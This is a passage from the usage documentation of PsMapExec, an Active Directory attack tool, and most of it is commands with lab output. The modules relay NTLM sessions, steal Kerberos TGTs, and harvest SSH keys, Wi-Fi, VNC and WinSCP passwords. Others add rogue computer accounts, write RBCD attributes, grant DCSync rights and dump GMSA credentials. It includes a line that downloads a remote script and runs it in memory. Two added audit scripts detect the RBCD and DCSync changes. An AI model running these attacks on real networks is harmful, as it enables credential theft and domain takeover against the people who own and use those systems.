[*] Invoking Command as [User:administrator] [Session ID:1]

security\administrator

WinRM   10.10.10.100    DC01.security.local           Windows Server 2022 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]

security\administrator

[*] Invoking Command as [User:moe] [Session ID:2]

security\moe

 

 

> SessionRelay

Creates a cmd.exe process within each user logon session on the remote system that connects to a non-existent share on the host specified by -ListenerIP. Each session authenticates to that host, so a listener such as Inveigh or Responder can capture the NTLMv2 hashes, or ntlmrelayx can relay them. The targets must be able to reach -ListenerIP on TCP/445.

For example, given the quser output below, the remote host currently has the users moe and administrator in existing logon sessions. PsMapExec can force each of these users to connect to a non-existent share on the listener, which captures their NTLMv1 or NTLMv2 hashes.

C:\Users\Administrator.SECURITY> quser
 
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 moe                                       2  Disc            .  21/05/2025 14:33
 administrator         console             3  Active      none   21/05/2025 17:50

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

Before using the module, ensure a listener (Inveigh, Ntlmrelayx, Responder) is running. The below example covers usage for capturing hashes with Inveigh.

# Load Inveigh into memory
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)

# Execute Inveigh (as admin), ensuring to specify the current systems IP address
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 10.10.10.11

# Run PsMapExec, ensuring -ListenerIP is set to the same IP address as above.
PsMapExec [Method] -Targets [Targets] -Module SessionRelay -ListenerIP 10.10.10.11

Example Output (PsMapExec)

PS > PsMapExec wmi -Targets MSSQL02 -Module SessionRelay -ShowOutput  -ListenerIP 10.10.10.11

[*] About to relay user Logon Sessions to the provided IP address [10.10.10.11]. Ensure Responder or Inveigh is running!

WMI   10.10.10.6      MSSQL02.security.local   Windows Server 2019 Standard   [+] SUCCESS

[+] Relaying as moe under Session ID:2
[+] Relaying as administrator under Session ID:3

Example Output (Inveigh Capture)

WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
[+] [2025-05-21T17:57:31] TCP(445) SYN packet detected from 10.10.10.6:50418
[+] [2025-05-21T17:57:31] SMB(445) negotiation request detected from 10.10.10.6:50418
[+] [2025-05-21T17:57:31] SMB(445) NTLM challenge CA043F45F218F5BF sent to 10.10.10.6:50418
[+] [2025-05-21T17:57:31] SMB(445) NTLMv2 captured for SECURITY\Moe from 10.10.10.6(MSSQL02):50418:

Moe::SECURITY:CA043F45F218F5BF:ABBD6A600858157ADC91747C338077F0:01010000000000002D3C4F7171CADB0171C3E <-- Snip -->

[+] [2025-05-21T17:57:32] SMB(445) NTLM challenge 089FF062A0ED001D sent to 10.10.10.6:50418
[+] [2025-05-21T17:57:32] SMB(445) NTLMv2 captured for SECURITY\Administrator from 10.10.10.6(MSSQL02):50418:

Administrator::SECURITY:089FF062A0ED001D:B6CEC6BD38A070CC23C2B3027F6A197A:010100000000000011DF587171C <-- Snip -->

 

 

> Snipped

Connects to the remote system and looks for screenshots taken with the Snipping Tool in each user's Pictures directory. Each image is downloaded and transferred back to PsMapExec for review. Obtained images are stored in $PWD\PME\Snipped\.

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage Examples

PsMapExec [Method] -Targets [Targets] -Module Snipped

 

 

> SSH

Connects to the remote system and looks for SSH keys and known_hosts files in the .ssh directory of each user profile. Collected information is automatically parsed and stored in $PWD\PME\SSH\.

Private keys may be passphrase-protected: the example key below declares aes256-ctr with the bcrypt KDF in its base64 header, so it has to be cracked (for example with ssh2john and John or hashcat) before it can be used. known_hosts entries are only readable when HashKnownHosts is off, as in the example; hashed entries yield no hostnames.

Optional Parameters

Parameter Value Description
-NoParse N/A Will omit parsing output from each system.
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage Examples

PsMapExec [Method] -Targets [Targets] -Module SSH -ShowOutput

Example Output

PS > PsMapExec wmi -Targets MSSQL02 -Module ssh -ShowOutput

WMI   10.10.10.6      MSSQL02.security.local   Windows Server 2019 Standard   [+] SUCCESS

[Key: C:\Users\Administrator.SECURITY\.ssh\id_ed25519]

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABD/1rHaDc
7PWp+GGHNM8ZfPAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIFqduZMpGAsxlIgw
N47k9l1D6HsB9ovDRZFgFjLfL613AAAAsJPmNU06sq5L8HndGwu9BOL/YJdzUh7uUOFJQb
5NJPsgGVwEKZKv+5stupXvQM6tPaRjqWfSFMCBth12sdz8kvDmqn7y3EN45Ct6tpOAIjHD
Y9xEHUerd2ptK2e3kpvRx5036Np8PiQN/4xIpYLv4Jxqbmp0tAtZV8oQwyb8+WLe9QteMM
HBea5LQ9Po1dEw0pFLcqHGuMGwhEjER2jjy8TGAS9Q7weD3mEBHr5NdBeX
-----END OPENSSH PRIVATE KEY-----

[Public Key: C:\Users\Administrator.SECURITY\.ssh\id_ed25519.pub]

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFqduZMpGAsxlIgwN47k9l1D6HsB9ovDRZFgFjLfL613 security\administrator@MSSQL02

[Known Hosts: C:\Users\Administrator.SECURITY\.ssh\known_hosts]

10.10.10.117
10.10.10.100

[Known Hosts: C:\Users\Administrator.SECURITY\.ssh\known_hosts.old]

10.10.10.100

 

 

> TGTDeleg

This module builds upon the SessionExec module: execution on the remote host runs Rubeus' tgtdeleg under each user logon session on that system. tgtdeleg requests a forwarded copy of the user's TGT through the Kerberos GSS-API delegation flow against a service trusted for unconstrained delegation (by default a domain controller), so no LSASS access is needed.

For example, given the quser output below, the remote host currently has the users moe, administrator and protected in existing logon sessions. PsMapExec will run Rubeus' tgtdeleg as each user and obtain a usable TGT.

C:\Users\Administrator.SECURITY> quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 moe                                       2  Disc           31  21/05/2025 14:33
 administrator                             3  Disc            .  21/05/2025 17:50
 protected             console             4  Active      none   21/05/2025 18:21

Output for TGTDeleg is stored in $PWD\PME\TGTDeleg\.

Note: There are some limitations with this module. TGTDeleg cannot obtain a usable TGT for a user who is a member of the Protected Users group or who has the "Account is sensitive and cannot be delegated" flag set. It also only applies to domain accounts, so local accounts are skipped (as MSSQL01 shows in the example output below).

Optional Parameters

Parameter Value Description
-NoParse N/A If specified, PsMapExec will not parse the ticket output.
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module TGTDeleg

Example Output

PS > PsMapExec winrm -Targets servers -Module tgtdeleg -ShowOutput

WinRM   10.10.10.5      SRV2012.security.local       Windows Server 2012 R2 Standard   [*] NO RESULTS
WinRM   10.10.10.12     Security-CA.security.local   Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.111    DC02.security.local          Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.17     MSSQL01.security.local       Windows Server 2022 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]
[-] Local user account, skipping...

WinRM   10.10.10.6      MSSQL02.security.local       Windows Server 2019 Standard      [+] SUCCESS

[*] Invoking Command as [User:moe] [Session ID:2]

doIFfDCCBXigAwIBBaEDAgEWooIEgDCCBHxhggR4MIIEdKADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoiMwIaADAgECoRowGBsGa3JidGd0Gw5TRUNVUklUWS5M
T0NBTKOCBDQwggQwoAMCARKhAwIBAqKCBCIEggQeK1WoMnfe6ICKWxPrHsjRAb85G15r4D1V36kHReWjSWWfX1qD7eahPAKN/q5INFHA7DpNxx1CtPLJRUHV
<-- Snip -->

[*] Invoking Command as [User:administrator] [Session ID:3]

doIF+DCCBfSgAwIBBaEDAgEWooIE8jCCBO5hggTqMIIE5qADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoiMwIaADAgECoRowGBsGa3JidGd0Gw5TRUNVUklUWS5M
T0NBTKOCBKYwggSioAMCARKhAwIBAqKCBJQEggSQXXpMHEymBODNn5+2qp+LXrhK1bsaHeEh/YGDtzzloaPtzWoRMgiFjc6F22Zw9OYhQlld61dmx/27FAig
<-- Snip -->

[*] Invoking Command as [User:protected] [Session ID:4]

Note: The above user "protected" is a member of the protected users group and as such, it is not possible to obtain a TGT with TGTDeleg.

Parsing

PsMapExec will parse the results from each system and present the results in a digestible and readable format. The notes field will highlight in yellow any interesting information about each result. Additionally, the output will generate easy one liner commands to run to impersonate the user.

The table below shows the possible values for the notes field.

Value Description
AdminCount=1 Identifies an account that may hold privileged permissions within the domain
Domain Admin, Enterprise Admin, Server Operator, Account Operator The account is a member of one of these privileged groups

 

 

> VNC

Description

This module searches the registry and configuration files of several VNC implementations (RealVNC, TightVNC, TigerVNC and UltraVNC) for stored VNC passwords and decrypts them. These products all obfuscate the password with DES under the same fixed key (E8 4A D6 60 C4 72 1A E0 when used with a standard DES implementation), so recovery is deterministic. It covers the following:

  • RealVNC: Searches the registry for VNC server proxy credentials.
  • TightVNC: Searches the registry for server passwords, control passwords, and view-only passwords.
  • TigerVNC: Searches the registry for server passwords.
  • UltraVNC: Searches for passwords in configuration files (ultravnc.ini) located in specified directories.

For each system output is stored in $PWD\PME\VNC\.

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module VNC -ShowOutput

Example Output

PS > PsMapExec winrm -Targets servers -Module vnc -ShowOutput

WinRM   10.10.10.100    DC01.security.local          Windows Server 2022 Standard      [*] NO RESULTS
WinRM   10.10.10.12     Security-CA.security.local   Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.6      MSSQL02.security.local       Windows Server 2019 Standard      [+] SUCCESS

[TightVNC]
========================================
Encrypted Password : 72AC5E4A13275F4B
Decrypted Password : Pass123
Encrypted Password : F46AAD6037EE12AB
Decrypted Password : Pass121
========================================


WinRM   10.10.10.17     MSSQL01.security.local       Windows Server 2022 Standard      [*] NO RESULTS
WinRM   10.10.10.111    DC02.security.local          Windows Server 2019 Standard      [+] SUCCESS

[UltraVNC]
========================================
Encrypted Password : B2CE129D0B6C0C7325
Decrypted Password : Pass001 
Encrypted Password : 92D91A9BA025BC22C3
Decrypted Password : ViewPass
========================================

 

 

> Wi-Fi

Identifies saved Wi-Fi profiles on the target and recovers their stored passwords.

For each system output is stored in $PWD\PME\Wi-Fi\.

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module WiFi -ShowOutput

Example Output

PS > PsMapExec smb -Targets servers -Module wifi -ShowOutput

SMB   10.10.10.100    DC01.security.local          Windows Server 2022 Standard      [*] NO RESULTS
SMB   10.10.10.12     Security-CA.security.local   Windows Server 2019 Standard      [*] NO RESULTS
SMB   10.10.10.6      MSSQL02.security.local       Windows Server 2019 Standard      [+] SUCCESS

PROFILE_NAME      PASSWORD
-------------      --------
HomeNetwork        myhomewifi123
OfficeWiFi         SecurePass!2023
CafeFreeWiFi       password123

 

 

> WinSCP

This module iterates through the registry, identifies stored WinSCP session information, decrypts it and shows the plaintext session details. WinSCP only obfuscates saved passwords with a reversible scheme unless a master password has been configured, in which case the stored password cannot be recovered this way.

For each system output is stored in $PWD\PME\WinSCP\.

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module WinSCP -ShowOutput

Example Output

PS > PsMapExec winrm -Targets servers -Module winscp -ShowOutput

WinRM   10.10.10.12     Security-CA.security.local   Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.17     MSSQL01.security.local       Windows Server 2022 Standard      [*] NO RESULTS
WinRM   10.10.10.111    DC02.security.local          Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.6      MSSQL02.security.local       Windows Server 2019 Standard      [+] SUCCESS

User              Session               Hostname         Username             Password
----              -------               --------         --------             --------
MSSQL02\protected [email protected]     s3.amazonaws.com AKIAIOSFODNN7EXAMPLE wJalrXUtnFEMI/K7MDENG/b...
MSSQL02\protected [email protected]     secure.local     scp_user             Passw0rd111

 

 


> LDAP / LDAPS

The following modules are exclusive to the LDAP and LDAPS methods in PsMapExec.

PsMapExec LDAP -Targets [Targets] -Module [Module]
PsMapExec LDAPS -Targets [Targets] -Module [Module]

Account Management

AddComputer

Adds a new computer account with a random name and password to the domain. By default any authenticated domain user can do this until ms-DS-MachineAccountQuota (10 by default) is exhausted; the new account is the usual trustee for AddRBCD.

PsMapExec LDAP -Targets [Targets] -domain [Domain] -Module AddComputer
PS > PsMapExec ldap -Targets DC01 -Module addcomputer

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Added Computer to security.local! 

[*] Name     : Evil_yJbI 
[*] Pass     : l8aTPjULv4QIdKMW 
[*] DN       : CN=Evil_yJbI,CN=Computers,DC=security,DC=local

RemoveComputer

Removes the specified computer account from the domain

PsMapExec LDAP -Targets [Targets] -domain [Domain] -TargetDN [TargetDN] -Module RemoveComputer
PS > PsMapExec ldap -Targets DC01 -Module RemoveComputer -TargetDN "CN=Evil_fsBk,CN=Computers,DC=security,DC=local"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully removed "CN=Evil_fsBk,CN=Computers,DC=security,DC=local" from the domain.

ResetPassword

Resets the password of the account to a random value

PsMapExec LDAP -Targets [Targets] -domain [Domain] -TargetDN [TargetDN] -Module ResetPassword
PS > PsMapExec ldap -Targets DC01 -Module ResetPassword -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully reset "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL" password to qupaI4fV1Y3BHeXd

ToggleAccount

Enables or disables the specified user or computer account (each run flips the current state)

PsMapExec LDAP -Targets [Targets] -domain [Domain] -Module ToggleAccount -TargetDN [TargetDN]
PS > PsMapExec ldap -Targets DC01 -Module ToggleAccount -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Disabled Account CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL

PS > PsMapExec ldap -Targets DC01 -Module ToggleAccount -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Enabled Account CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL

Group Management

AddToGroup

Adds a specified object to a group

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -GroupDN [GroupDN] -TargetDN [TargetDN] -Module AddToGroup
PS > PsMapExec ldap -Targets DC01 -Module AddToGroup -GroupDN "CN=Spicy_Admins,CN=Users,DC=SECURITY,DC=LOCAL" -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully added CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL to CN=Spicy_Admins,CN=Users,DC=SECURITY,DC=LOCAL

RemoveFromGroup

Removes a specified object from a group

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -GroupDN [GroupDN] -TargetDN [TargetDN] -Module RemoveFromGroup
PS > PsMapExec ldap -Targets DC01 -Module RemoveFromGroup -GroupDN "CN=Spicy_Admins,CN=Users,DC=SECURITY,DC=LOCAL" -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully removed CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL from CN=Spicy_Admins,CN=Users,DC=SECURITY,DC=LOCAL

SPN Management

AddSPN

Adds a new random SPN to the target account

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -Module AddSPN
PS > PsMapExec ldap -Targets DC01 -Module AddSPN -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully set SPN "cifs/J30ZiozDkMQL4qbd.domain.com" for CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL

RemoveSPN

Removes ALL SPNs from the target account

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -Module RemoveSPN
PS > PsMapExec ldap -Targets DC01 -Module RemoveSPN -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully Unset SPNs for CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL

Delegation Management

AddRBCD

Grants the trustee identified by -SID (for example S-1-5-21-55... ) ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity on the specified account

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -SID [SID] -Module AddRBCD
PS > PsMapExec ldap -Targets DC01 -Module AddRBCD -TargetDN "CN=MSSQL01,CN=Computers,DC=SECURITY,DC=LOCAL" -SID "S-1-5-21-1201573619-2117991115-2379797238-1120"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[+] msDS-AllowedToActOnBehalfOfOtherIdentity successfully added on "CN=MSSQL01,CN=Computers,DC=SECURITY,DC=LOCAL" for SID: S-1-5-21-1201573619-2117991115-2379797238-1120

ConstrainedDelegation

Enumerate user and computer objects configured for constrained delegation

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module ConstrainedDelegation

Example Output

PS > PsMapExec LDAP -Targets winterfell -domain north.sevenkingdoms.local -module ConstrainedDelegation

LDAP   192.168.56.11   WINTERFELL     NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users with Constrained Delegation

Name                : jon.snow
Enabled             : True
AllowedToDelegateTo : CIFS/winterfell;CIFS/winterfell.north.sevenkingdoms.local

[*] Computers with Constrained Delegation

Name                : CASTELBLACK$
FQDN                : castelblack.north.sevenkingdoms.local
OperatingSystem     : Windows Server 2019 Datacenter Evaluation
Enabled             : True
AllowedToDelegateTo : HTTP/winterfell;HTTP/winterfell.north.sevenkingdoms.local

RemoveRBCD

Clears the ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute for the target.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -Module RemoveRBCD
PS > PsMapExec ldap -Targets DC01 -Module RemoveRBCD -TargetDN "CN=MSSQL01,CN=Computers,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[+] msDS-AllowedToActOnBehalfOfOtherIdentity Removed from CN=MSSQL01,CN=Computers,DC=SECURITY,DC=LOCAL
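The AddRBCD and RemoveRBCD modules above write and clear a binary security descriptor on the target computer object. The following is an added audit example, not PsMapExec code, that lists every computer carrying that attribute and resolves the trustees it names, so a change like the one shown above can be found and reviewed; it assumes a domain-joined host with read access to computer objects and uses only System.DirectoryServices.

```powershell
# Added example (not part of PsMapExec): enumerate computers whose
# msDS-AllowedToActOnBehalfOfOtherIdentity attribute is populated and
# resolve each trustee SID in its DACL. Assumes a domain-joined host.
function Get-RbcdTrustees {
    param(
        # Defaults to the current domain's naming context
        [string]$SearchBase = ([ADSI]"LDAP://RootDSE").defaultNamingContext
    )

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    # Only computers that actually carry the RBCD attribute
    $searcher.Filter   = "(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))"
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@("distinguishedName", "msDS-AllowedToActOnBehalfOfOtherIdentity"))

    foreach ($result in $searcher.FindAll()) {
        $dn    = $result.Properties["distinguishedname"][0]
        $bytes = $result.Properties["msds-allowedtoactonbehalfofotheridentity"][0]

        # The attribute is a raw security descriptor; each DACL ACE is one trustee
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)
        foreach ($ace in $sd.DiscretionaryAcl) {
            $sid = $ace.SecurityIdentifier
            try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $name = "<unresolved>" }   # deleted or foreign-domain trustee

            [PSCustomObject]@{
                Computer   = $dn
                TrusteeSID = $sid.Value
                Trustee    = $name
                AceType    = $ace.AceType
            }
        }
    }
}

# Trustees that are not a known, approved front-end service warrant review
Get-RbcdTrustees | Format-Table -AutoSize
```

Compare the output against your approved delegation baseline; an unresolved SID or a trustee that is an ordinary user or workstation account is the pattern the AddRBCD example produces.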

UnconstrainedDelegation

Enumerate user and computer objects configured for unconstrained delegation

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -module unconstrainedDelegation

Example Output

PS > PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -module unconstrainedDelegation

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Unconstrained Delegation Users

No users found with unconstrained delegation.

[*] Unconstrained Delegation Computers

Name          OperatingSystem                           Enabled IPAddress       DC
----          ---------------                           ------- ---------       --
KINGSLANDING$ Windows Server 2019 Datacenter Evaluation    True 192.168.56.10 True
REDKEEP$      Windows Server 2019 Standard                 True 192.168.56.30 True

Information Gathering

AdminCount

Obtains each user and group with AdminCount=1 set.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module AdminCount

Example Output

PS C:\Users\moe\Desktop> PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -Module AdminCount

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] AdminCount=1 Users

admin_2
Administrator
cersei.lannister
krbtgt
Moe
robert.baratheon
vagrant

[*] AdminCount=1 Groups
Account Operators
Administrators
Backup Operators
Domain Admins
Domain Controllers
DragonRider
Enterprise Admins
Enterprise Key Admins

ComputerSIDs

Obtains each computer SID in the domain

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module ComputerSIDs

Example Output

PS C:\Users\moe\Desktop> PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -Module ComputerSIDs

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Computer SIDs

sAMAccountName SID
-------------- ---
BVMDWWEQ$      S-1-5-21-4056014253-3096967110-678733760-1187
CASTERLYROCK$  S-1-5-21-4056014253-3096967110-678733760-1126
DRAGONSTONE$   S-1-5-21-4056014253-3096967110-678733760-1124
Evil_127b$     S-1-5-21-4056014253-3096967110-678733760-1182
Evil_bHx7$     S-1-5-21-4056014253-3096967110-678733760-1604

MAQ

Gets the domain Machine Account Quota value.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module MAQ
PS > PsMapExec ldap -Targets DC01.Security.local -Module maq

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

Machine Account Quota: 10

UserDescriptions

Obtains each user that has a description.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module UserDescriptions

Example Output

PS > PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -u rc4 -p Password123 -Module UserDescriptions

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users with Description

sAMAccountName    Description
--------------    -----------
Administrator     Built-in account for administering the computer/domain
cersei.lannister  Cersei Lanister
Guest             Built-in account for guest access to the computer/domain
jaime.lannister   Jaime Lanister
joffrey.baratheon Joffrey Baratheon
krbtgt            Key Distribution Center Service Account
lord.varys        Lord Varys
lysa.arryn        Lysa Arryn
maester.pycelle   Maester Pycelle

UserLogonRestrictions

Obtains each user that has logon restrictions applied

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module UserLogonRestrictions

Example Output

PS > PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -Module UserLogonRestrictions

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users Logon Restrictions

sAMAccountName AllowedToLogon
-------------- --------------
admin_1        the-eyrie

UserPasswords

Obtains each user that has the userPassword or unixUserPassword attribute populated.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module UserPasswords

Example Output

PS > PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -u rc4 -p Password123 -Module UserPasswords

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users SIDs

sAMAccountName userPassword unixPassword
-------------- ------------ ------------
admin_1        Password123     Un1xPass!

UserSIDs

Obtains each user SID in the domain

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module UserSIDs

Example Output

PS C:\Users\moe\Desktop> PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -Module UserSIDs

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users SIDs

sAMAccountName       SID
--------------       ---
$V31000-ECFT78ITR5GR S-1-5-21-4056014253-3096967110-678733760-1151
admin_1              S-1-5-21-4056014253-3096967110-678733760-1173
admin_2              S-1-5-21-4056014253-3096967110-678733760-1181
Administrator        S-1-5-21-4056014253-3096967110-678733760-500
cersei.lannister     S-1-5-21-4056014253-3096967110-678733760-1115
ESSOS$               S-1-5-21-4056014253-3096967110-678733760-1105
Guest                S-1-5-21-4056014253-3096967110-678733760-501

Privilege Escalation

Elevate

Elevates the specified account to perform DCSync within the targeted DC's domain.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -Module Elevate
PS > PsMapExec ldap -Targets DC01 -Module Elevate -TargetDN "CN=Mendez,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Retrieving SID of user 
[*] User SID: S-1-5-21-1201573619-2117991115-2379797238-1120
[*] Domain DN: DC=SECURITY,DC=LOCAL
[*] Retrieving security descriptor for domain DC=SECURITY,DC=LOCAL
[*] Retrieved current security descriptor
[*] Added DCSync ACEs to security descriptor
[+] Successfully granted DCSync rights to CN=Mendez,CN=Users,DC=SECURITY,DC=LOCAL
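The Elevate output above shows the domain object's security descriptor being rewritten with replication ACEs. The following is an added audit example, not PsMapExec code, that reads the domain DACL and reports every principal holding the replication control access rights that together permit DCSync; it assumes a domain-joined host and the well-known GUIDs of those rights.

```powershell
# Added example (not part of PsMapExec): report principals granted the
# directory replication extended rights on the domain naming context.
# Assumes a domain-joined host with read access to the domain object.
function Get-DcSyncGrants {
    param(
        [string]$DomainDN = ([ADSI]"LDAP://RootDSE").defaultNamingContext
    )

    # Well-known control access right GUIDs used by replication
    $replRights = @{
        "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" = "DS-Replication-Get-Changes"
        "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" = "DS-Replication-Get-Changes-All"
        "89e95b76-444d-4c62-991a-0facbeda640c" = "DS-Replication-Get-Changes-In-Filtered-Set"
    }
    $allRights = [guid]::Empty.ToString()   # empty GUID = every extended right

    $domain = [ADSI]"LDAP://$DomainDN"
    $rules  = $domain.ObjectSecurity.GetAccessRules(
        $true, $true, [System.Security.Principal.SecurityIdentifier])

    foreach ($rule in $rules) {
        if ($rule.AccessControlType -ne "Allow") { continue }
        $hasExt = $rule.ActiveDirectoryRights -band `
            [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
        if (-not $hasExt) { continue }

        $guid = $rule.ObjectType.ToString().ToLower()
        if ($guid -eq $allRights)            { $right = "All extended rights" }
        elseif ($replRights.ContainsKey($guid)) { $right = $replRights[$guid] }
        else                                 { continue }

        $sid = $rule.IdentityReference
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = "<unresolved>" }

        # Domain Controllers (RID 516), Enterprise Admins (RID 519), Administrators
        # and Enterprise Domain Controllers normally hold these; anything else is
        # the kind of grant the Elevate module adds and should be reviewed.
        $expected = ($sid.Value -match '-(516|519)$') -or
                    ($sid.Value -in @("S-1-5-32-544", "S-1-5-9"))

        [PSCustomObject]@{
            Principal = $name
            SID       = $sid.Value
            Right     = $right
            Inherited = $rule.IsInherited
            Expected  = $expected
        }
    }
}

Get-DcSyncGrants | Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

The Expected flag is a coarse default-principal check; validate it against your own baseline, since tiered-admin models and backup products legitimately add replication grants.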

Credential Extraction

GMSA

Dumps GMSA credentials

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module GMSA
